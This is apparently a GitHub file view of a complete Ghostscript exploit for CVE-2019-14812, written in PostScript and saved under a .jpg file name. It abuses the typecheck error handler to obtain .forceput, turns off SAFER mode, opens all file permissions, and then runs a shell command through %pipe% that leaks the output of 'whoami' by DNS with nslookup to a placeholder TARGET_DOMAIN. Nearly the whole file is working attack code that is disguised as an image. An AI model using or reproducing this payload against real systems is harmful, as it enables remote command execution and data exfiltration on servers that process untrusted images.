-
Notifications
You must be signed in to change notification settings - Fork 79
/
Copy pathcve-2019-14812-nslookup-dnsbased.jpg
78 lines (67 loc) · 2.18 KB
/
cve-2019-14812-nslookup-dnsbased.jpg
File metadata and controls
78 lines (67 loc) · 2.18 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
%!PS
%%
%% Safer Mode Bypass by `.forceput` Exposure from `setuserparams`
%%
%% Author: Hiroki MATSUKUMA
%%
/println { (\n) exch print print } bind executeonly def
/info { ([*] ) print println } bind executeonly def
/success { ([+] ) print println } bind executeonly def
/fail { ([-] ) print println stop } bind executeonly def
/MaxFileSize 16#10000 def
/readfile {
(r) file
dup MaxFileSize string readstring pop
exch closefile
} bind executeonly def
/osexec {
(%pipe%) exch concatstrings readfile
} bind executeonly def
(=============================================================================)
(= Safer Mode Bypass by `.forceput` Exposure from `setuserparams` =)
(=============================================================================)
println println println
(Obtaining .forceput operator from setuserparams operator...) info
/.forceput null def
/&typecheck errordict /typecheck get def
/typecheckcount 0 def
errordict /typecheck {
/typecheckcount typecheckcount 1 add def
typecheckcount 3 eq {
1 index 5 get 31 get
/.forceput exch store
} if
} put
null setuserparams clear
errordict /typecheck currentdict /&typecheck get put
[
/&typecheck
/typecheckcount
] { currentdict exch undef } forall
(A candidate for .forceput operator found!) success
(Attempting sanity check with the candidate for .forceput operator...) info
<< /overwritten false >> readonly
begin
currentdict /overwritten true .forceput
overwritten not {
/.forceput where { /.forceput undef } if
} if
end
currentdict /.forceput known not {
(.forceput operator could not found...) fail
} if
(Successfully got .forceput operator!) success
(Overwriting several flags to escape from Safer Mode...) info
systemdict /SAFER false .forceput
userparams /LockFilePermissions false .forceput
userparams /PermitFileControl [(*)] .forceput
userparams /PermitFileWriting [(*)] .forceput
userparams /PermitFileReading [(*)] .forceput
save restore
SAFER {
(Could not escape from Safer Mode.) fail
} bind executeonly if
(Successfully escaped from Safer Mode!) success
% run command
(%pipe%nslookup $(whoami).linux.ghostscript-cve-2019-14812.TARGET_DOMAIN > /tmp/success) (w) file closefile
quit